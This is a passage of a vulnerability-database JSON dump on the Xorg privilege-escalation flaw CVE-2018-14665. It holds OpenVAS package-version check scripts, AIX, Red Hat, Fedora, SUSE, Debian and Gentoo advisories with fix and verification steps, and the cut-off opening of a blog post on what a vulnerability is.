isdpkgvuln(pkg:\"xserver-common\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xserver-xephyr\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xserver-xorg-core\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xserver-xorg-dev\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xserver-xorg-legacy\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xvfb\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xwayland\", ver:\"2:1.19.2-1+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "description": "The remote host is missing an update for the ", "modified": "2019-03-08T00:00:00", "published": "2018-12-18T00:00:00", "id": "OPENVAS:1361412562310882986", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882986", "type": "openvas", "title": "CentOS Update for xorg-x11-server-common CESA-2018:3410 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id$\n#\n# CentOS Update for xorg-x11-server-common CESA-2018:3410 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882986\");\n script_version(\"$Revision: 14058 $\");\n script_cve_id(\"CVE-2018-14665\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-18 07:38:56 +0100 (Tue, 18 Dec 2018)\");\n script_name(\"CentOS Update for xorg-x11-server-common CESA-2018:3410 centos7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n\n script_xref(name:\"CESA\", value:\"2018:3410\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2018-December/023131.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xorg-x11-server-common'\n package(s) announced via the CESA-2018:3410 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"X.Org is an open-source implementation of the X Window System. It provides\nthe basic low-level functionality that full-fledged graphical user\ninterfaces are designed upon.\n\nSecurity Fix(es):\n\n * xorg-x11-server: Incorrect permission check in Xorg X server allows for\nprivilege escalation (CVE-2018-14665)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section.\n\nRed Hat would like to thank Narendra Shinde for reporting this issue.\");\n\n script_tag(name:\"affected\", value:\"xorg-x11-server-common on CentOS 7.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-common\", rpm:\"xorg-x11-server-common~1.20.1~5.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-devel\", rpm:\"xorg-x11-server-devel~1.20.1~5.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-source\", rpm:\"xorg-x11-server-source~1.20.1~5.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xdmx\", rpm:\"xorg-x11-server-Xdmx~1.20.1~5.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xephyr\", rpm:\"xorg-x11-server-Xephyr~1.20.1~5.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xnest\", rpm:\"xorg-x11-server-Xnest~1.20.1~5.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xorg\", rpm:\"xorg-x11-server-Xorg~1.20.1~5.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xvfb\", rpm:\"xorg-x11-server-Xvfb~1.20.1~5.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xwayland\", rpm:\"xorg-x11-server-Xwayland~1.20.1~5.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:38:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1547", "CVE-2018-14665", "CVE-2018-20839"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220201062", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201062", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for xorg-x11-server (EulerOS-SA-2020-1062)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1062\");\n script_version(\"2020-01-23T13:18:37+0000\");\n script_cve_id(\"CVE-2018-14665\", \"CVE-2018-20839\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 13:18:37 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 13:18:37 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for xorg-x11-server (EulerOS-SA-2020-1062)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.5\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1062\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1062\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'xorg-x11-server' package(s) announced via the EulerOS-SA-2020-1062 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An incorrect permission check for -modulepath and -logfile options when starting Xorg X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.(CVE-2018-14665)\n\nsystemd 242 changes the VT1 mode upon a logout, which allows attackers to read cleartext passwords in certain circumstances, such as watching a shutdown, or using Ctrl-Alt-F1 and Ctrl-Alt-F2. This occurs because the KDGKBMODE (aka current keyboard mode) check is mishandled.(CVE-2018-20839)(CVE-2019-1547)\");\n\n script_tag(name:\"affected\", value:\"'xorg-x11-server' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.5.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.5.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xorg\", rpm:\"xorg-x11-server-Xorg~1.20.1~4.h4.eulerosv2r8\", rls:\"EULEROSVIRTARM64-3.0.5.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-common\", rpm:\"xorg-x11-server-common~1.20.1~4.h4.eulerosv2r8\", rls:\"EULEROSVIRTARM64-3.0.5.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "aix": [{"lastseen": "2020-04-22T00:52:05", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Tue Dec 11 09:32:52 CST 2018\n|Updated: Tue Apr 9 09:52:17 CDT 2019\n|Update: Added AIX 7100-04-07 and 7200-02-03 as affected.\n| Added iFixes for AIX 7100-04-07 and 7200-02-03.\n\nThe most recent version of this document is available here:\nhttp://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc\nhttps://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc\nftp://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc\n\nSecurity Bulletin: Vulnerability in Xorg affects AIX (CVE-2018-14665)\n\n===============================================================================\n\nSUMMARY:\n\n There is a vulnerability in Xorg that affects AIX.\n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2018-14665\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665\n DESCRIPTION: X.Org X server could allow a remote authenticated attacker \n to gain elevated privileges on the system, caused by improper \n validation of command line parameters. An attacker could exploit this \n vulnerability using the -modulepath argument or the -logfile argument \n to overwrite arbitrary files and execute unprivileged code on the \n system.\n CVSS Base Score: 8.8\n CVSS Temporal Score: See \n https://exchange.xforce.ibmcloud.com/vulnerabilities/151991\n for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\n\n AFFECTED PRODUCTS AND VERSIONS:\n \n AIX 6.1, 7.1, 7.2\n VIOS 2.2.x \n\n The following fileset levels are vulnerable:\n \n key_fileset = aix\n\n Fileset Lower Level Upper Level KEY \n ---------------------------------------------------------\n X11.base.rte 6.1.9.0 6.1.9.100 key_w_fs\n| X11.base.rte 7.1.4.0 7.1.4.31 key_w_fs\n X11.base.rte 7.1.5.0 7.1.5.31 key_w_fs\n X11.base.rte 7.2.0.0 7.2.0.1 key_w_fs\n X11.base.rte 7.2.1.0 7.2.1.0 key_w_fs\n| X11.base.rte 7.2.2.0 7.2.2.16 key_w_fs\n X11.base.rte 7.2.3.0 7.2.3.15 key_w_fs\n \n To find out whether the affected filesets are installed \n on your systems, refer to the lslpp command found in AIX user's guide.\n\n Example: lslpp -L | grep -i X11.base.rte\n\n\n REMEDIATION:\n\n A. APARS\n \n IBM has assigned the following APARs to this problem:\n\n AIX Level APAR Availability SP KEY\n ------------------------------------------------\n 6.1.9 IJ11000 ** N/A key_w_apar\n 7.1.4 IJ11544 ** SP08 key_w_apar\n 7.1.5 IJ11544 ** N/A key_w_apar\n 7.1.5 IJ11545 ** SP04 key_w_apar\n 7.2.0 IJ11546 ** N/A key_w_apar\n 7.2.1 IJ11547 ** SP06 key_w_apar\n 7.2.2 IJ11549 ** SP04 key_w_apar\n 7.2.3 IJ11550 ** SP03 key_w_apar\n\n VIOS Level APAR Availability SP KEY\n ----------------------------------------------------\n 2.2.4 IJ11000 ** N/A key_w_apar\n 2.2.5 IJ11000 ** 2.2.5.60 key_w_apar\n 2.2.6 IJ11000 ** 2.2.6.40 key_w_apar\n 3.1.0 IJ11550 ** 3.1.0.20 key_w_apar\n\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IJ11000\n http://www.ibm.com/support/docview.wss?uid=isg1IJ11544\n http://www.ibm.com/support/docview.wss?uid=isg1IJ11545\n http://www.ibm.com/support/docview.wss?uid=isg1IJ11546\n http://www.ibm.com/support/docview.wss?uid=isg1IJ11547\n http://www.ibm.com/support/docview.wss?uid=isg1IJ11549\n http://www.ibm.com/support/docview.wss?uid=isg1IJ11550\n\n https://www.ibm.com/support/docview.wss?uid=isg1IJ11000\n https://www.ibm.com/support/docview.wss?uid=isg1IJ11544\n https://www.ibm.com/support/docview.wss?uid=isg1IJ11545\n https://www.ibm.com/support/docview.wss?uid=isg1IJ11546\n https://www.ibm.com/support/docview.wss?uid=isg1IJ11547\n https://www.ibm.com/support/docview.wss?uid=isg1IJ11549\n https://www.ibm.com/support/docview.wss?uid=isg1IJ11550\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n AIX and VIOS fixes are available.\n\n The AIX and VIOS fixes can be downloaded via ftp or http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/xorg_fix3.tar\n http://aix.software.ibm.com/aix/efixes/security/xorg_fix3.tar\n https://aix.software.ibm.com/aix/efixes/security/xorg_fix3.tar \n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n\n AIX Level Interim Fix (*.Z) KEY\n ----------------------------------------------\n 6.1.9.x IJ11000s0b.181127.epkg.Z key_w_fix\n 7.1.4.4 IJ11544s0a.181127.epkg.Z key_w_fix\n 7.1.4.5 IJ11544s0a.181127.epkg.Z key_w_fix\n 7.1.4.6 IJ11544s0a.181127.epkg.Z key_w_fix\n| 7.1.4.7 IJ11544s0a.190312.epkg.Z key_w_fix\n 7.1.5.0 IJ11544s0a.181127.epkg.Z key_w_fix\n 7.1.5.1 IJ11544s0a.181127.epkg.Z key_w_fix\n 7.1.5.2 IJ11544s0a.181127.epkg.Z key_w_fix\n 7.1.5.3 IJ11544s0a.181127.epkg.Z key_w_fix\n 7.1.5.3 IJ11545s0a.181127.epkg.Z key_w_fix\n 7.2.0.x IJ11546s0a.181127.epkg.Z key_w_fix\n 7.2.1.x IJ11547s0a.181127.epkg.Z key_w_fix\n 7.2.2.x IJ11549s0a.181127.epkg.Z key_w_fix\n 7.2.2.0 IJ11549s0a.181127.epkg.Z key_w_fix\n 7.2.2.1 IJ11549s0a.181127.epkg.Z key_w_fix\n 7.2.2.2 IJ11549s0a.181127.epkg.Z key_w_fix\n| 7.2.2.3 IJ11549s0a.190312.epkg.Z key_w_fix\n 7.2.3.x IJ11550s0a.181127.epkg.Z key_w_fix\n\n Please reference the Affected Products and Version section above\n for help with checking installed fileset levels.\n\n NOTE: Multiple iFixes are provided for AIX 7100-05-03.\n IJ11544s0a is for AIX 7100-05-03 with X11.base.rte fileset level 7.1.4.30.\n IJ11545s0a is for AIX 7100-05-03 with X11.base.rte fileset level 7.1.5.31.\n\n VIOS Level Interim Fix (*.Z) KEY\n -----------------------------------------------\n 2.2.x IJ11000s0b.181127.epkg.Z key_w_fix\n 3.1.x IJ11550s0a.181127.epkg.Z key_w_fix\n\n To extract the fixes from the tar file:\n\n tar xvf xorg_fix3.tar\n cd xorg_fix3\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 [filename]\" command as the following:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n 81a407e154ab90e003135bf075f171b127d811e3a9177cb866d589ff2459ef19 IJ11000s0b.181127.epkg.Z key_w_csum\n 458f8391ceabeedf418f54595ce9ef87d63a667369dc4a3112b8548bff80fb6d IJ11544s0a.181127.epkg.Z key_w_csum\n| 2b719e0b4d8bdcb89f97ffe1ecceccfbf0538cb2cdec66b8214eeae7c7b37958 IJ11544s0a.190312.epkg.Z key_w_csum\n 041e1271b858211365025a4528c71f453c72405a1f0809128e0c70d49886a166 IJ11545s0a.181127.epkg.Z key_w_csum\n 1f4f7a7ef34c7804464ccdc02f1a253ac373a9c66ee3144350b390509976cfad IJ11546s0a.181127.epkg.Z key_w_csum\n 8aac56821f52600ee3158efa39e0bf697813712364b946c199fbb32dd1da9ce6 IJ11547s0a.181127.epkg.Z key_w_csum\n 7518d581224e6b4332b4cfab48253a7427fb0e3ab866567766b2d137bc0e9267 IJ11549s0a.181127.epkg.Z key_w_csum\n| 0eea9877dcaf6ffbd6c0d7572fd7ceb6437ef1f0b2f3134a22afc47260e9e7c5 IJ11549s0a.190312.epkg.Z key_w_csum\n f18e4f2efd4f488e7a02de90bfa6992b604298dba1d588689d4e58e71b3738db IJ11550s0a.181127.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM Support at\n http://ibm.com/support/ and describe the discrepancy. \n \n openssl dgst -sha1 -verify [pubkey_file] -signature [advisory_file].sig [advisory_file]\n \n openssl dgst -sha1 -verify [pubkey_file] -signature [ifix_file].sig [ifix_file]\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc.sig \n\n C. FIX AND INTERIM FIX INSTALLATION\n\n If possible, it is recommended that a mksysb backup of the system \n be created. Verify it is both bootable and readable before\n proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n WORKAROUNDS AND MITIGATIONS:\n\n None.\n\n\n===============================================================================\n\nCONTACT US:\n\n Note: Keywords labeled as KEY in this document are used for parsing\n purposes.\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Contact IBM Support for questions related to this announcement:\n\n http://ibm.com/support/\n https://ibm.com/support/\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n ftp://ftp.software.ibm.com/systems/power/AIX/systems_p_os_aix_security_pubkey.txt\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n \n Complete CVSS v3 Guide: http://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n\n\nRELATED INFORMATION:\n\n IBM Secure Engineering Web Portal\n http://www.ibm.com/security/secure-engineering/bulletins.html\n\n IBM Product Security Incident Response Blog\n https://www.ibm.com/blogs/psirt/\n\n Security Bulletin: Vulnerability in Xorg affects AIX (CVE-2018-14665)\n https://www-01.ibm.com/support/docview.wss?uid=ibm10742279\n\nACKNOWLEDGEMENTS:\n\n None.\n\n\nCHANGE HISTORY:\n\n First Issued: Tue Dec 11 09:32:52 CST 2018\n Updated: Mon Dec 17 08:33:34 CST 2018\n Update: Corrected the iFixes listed for AIX 7100-05.\n| Updated: Tue Apr 9 09:52:17 CDT 2019\n| Update: Added AIX 7100-04-07 and 7200-02-03 as affected.\n| Added iFixes for AIX 7100-04-07 and 7200-02-03.\n\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will \nultimately impact the Overall CVSS Score. Customers can evaluate the impact \nof this vulnerability in their environments by accessing the links in the \nReference section of this Security Bulletin. \n\nDisclaimer\nAccording to the Forum of Incident Response and Security Teams (FIRST), the \nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard \ndesigned to convey vulnerability severity and help to determine urgency and \npriority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \nFOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT \nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n\n", "edition": 13, "modified": "2019-04-09T09:52:17", "published": "2018-12-11T09:32:52", "id": "XORG_ADVISORY3.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc", "title": "There is a vulnerability in Xorg that affects AIX.,There is a vulnerability in Xorg that affects VIOS.", "type": "aix", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:44:47", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "X.Org is an open-source implementation of the X Window System. It provides the basic low-level functionality that full-fledged graphical user interfaces are designed upon.\n\nSecurity Fix(es):\n\n* xorg-x11-server: Incorrect permission check in Xorg X server allows for privilege escalation (CVE-2018-14665)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Narendra Shinde for reporting this issue.", "modified": "2018-10-30T19:08:55", "published": "2018-10-30T18:57:30", "id": "RHSA-2018:3410", "href": "https://access.redhat.com/errata/RHSA-2018:3410", "type": "redhat", "title": "(RHSA-2018:3410) Important: xorg-x11-server security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "X.Org X11 X server ", "modified": "2018-11-08T02:20:52", "published": "2018-11-08T02:20:52", "id": "FEDORA:89D3F649CE94", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: xorg-x11-server-1.19.6-10.fc28", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "X.Org X11 X server ", "modified": "2018-11-05T02:01:32", "published": "2018-11-05T02:01:32", "id": "FEDORA:868B960B9EC7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: xorg-x11-server-1.20.3-1.fc29", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2018-11-17T02:48:05", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "This update for xorg-x11-server fixes the following issues:\n\n - CVE-2018-14665: Disable -logfile and -modulepath when running with\n elevated privileges (bsc#1112020,\n\n Note that SUSE by default does not run with elevated privileges, so the\n default installation is not affected by this problem.\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2018-11-17T00:12:28", "published": "2018-11-17T00:12:28", "id": "OPENSUSE-SU-2018:3800-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-11/msg00022.html", "title": "Security update for xorg-x11-server (moderate)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "debian": [{"lastseen": "2020-08-31T12:57:17", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4328-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nOctober 25, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : xorg-server\nCVE ID : CVE-2018-14665\n\nNarendra Shinde discovered that incorrect command-line parameter\nvalidation in the Xorg X server may result in arbitary file overwrite,\nwhich can result in privilege escalation.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 2:1.19.2-1+deb9u4.\n\nWe recommend that you upgrade your xorg-server packages.\n\nFor the detailed security status of xorg-server please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/xorg-server\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 11, "modified": "2018-10-25T21:31:56", "published": "2018-10-25T21:31:56", "id": "DEBIAN:DSA-4328-1:FB5A7", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00259.html", "title": "[SECURITY] [DSA 4328-1] xorg-server security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2018-10-31T00:03:19", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "### Background\n\nThe X Window System is a graphical windowing system based on a client/server model. \n\n### Description\n\nAn incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges. \n\n### Impact\n\nA local attacker can escalate privileges to root by passing crafted parameters to the X.org X server. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll X.Org X Server users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=x11-base/xorg-server-1.20.3\"", "edition": 1, "modified": "2018-10-30T00:00:00", "published": "2018-10-30T00:00:00", "id": "GLSA-201810-09", "href": "https://security.gentoo.org/glsa/201810-09", "title": "X.Org X Server: Privilege escalation", "type": "gentoo", "cvss": {"score": 0.0, "vector": "NONE"}}], "avleonov": [{"lastseen": "2019-02-23T17:55:52", "bulletinFamily": "blog", "cvelist": ["CVE-2018-14665"], "description": "It looks like a pretty simple question. I used it to started my [MIPT lecture](<https://avleonov.com/2018/12/29/mipt-phystech-guest-lecture-vulnerabilities-money-and-people/>). But actually the answer is not so obvious. There are lots of formal definitions of a _vulnerability_. For example in [NIST Glossary](<https://csrc.nist.gov/glossary>) there are 17 different definitions. The most popular one (used in 13 documents) is:\n\n> Vulnerability is a weakness in an information system, system security procedures, internal controls, or implementation that could be exploited or triggered by a threat source \nNISTIR 7435 The Common Vulnerability Scoring System (CVSS) and Its Applicability to Federal Agency Systems\n\nBut I prefer this one, it's from the glossary as well:\n\n> Vulnerability is a **bug**, flaw, weakness, or exposure of an application, system, device, or service that could lead to a failure of confidentiality, integrity, or availability.\n\nI think the best way to talk about vulnerabilities is to treat them as bugs and errors. Because people deal with such entities more often in a form of software freezes and BSODs. \n\nYou probably heard a joke, that a bug can be presented as a feature if it is well-documented and the software developers don't want to 